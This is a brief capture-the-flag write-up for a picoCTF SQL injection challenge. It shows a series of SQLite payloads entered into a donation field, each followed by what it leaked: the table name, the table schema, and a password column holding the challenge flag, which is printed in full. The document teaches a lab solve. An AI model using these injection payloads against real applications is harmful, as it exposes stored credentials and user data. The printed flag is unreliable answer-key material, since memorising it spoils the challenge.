Rating:
# Startup Company
This is a `SQLi` challenge that involves leaking table data in order to find the flag. I Registered for an account and entered the payload into the `donation` input bar by removing it's `number only` class via the debug console and I get an `database error`. Now what?
## Method
We are supposed to extract table names and stuff using SQLi
Reffer to `Empire 1 ` from pico2019
# Payloads and Leaks
payload
```
'||(select tbl_name FROM sqlite_master WHERE type='table' limit 0,1 COLLATE NOCASE)||'
```
leak
```
startup_users
```
We see that we found a table called `startup_users`
---
payload
```
'||(select tbl_name FROM sqlite_master WHERE type='table' limit 1,1 COLLATE NOCASE)||'
```
leak
```
none
```
We see that `startup_users` is the only table in the database.
---
payload
```
'||(select sql FROM sqlite_master WHERE type='table' limit 0,1 COLLATE NOCASE)||'
```
leak
```
$CREATE TABLE startup_users (nameuser text, wordpass text, money int)
```
We leak the SQL structure of the table in which we can see the `wordpass` column stands out.
---
payload
```
'||(select wordpass FROM startup_users where wordpass like '%picoCTF%' limit 0,1 COLLATE NOCASE)||'
```
leak
```
picoCTF{1_c4nn0t_s33_y0u_55fb70fa}
```
We have leaked the `word_pass` column data.
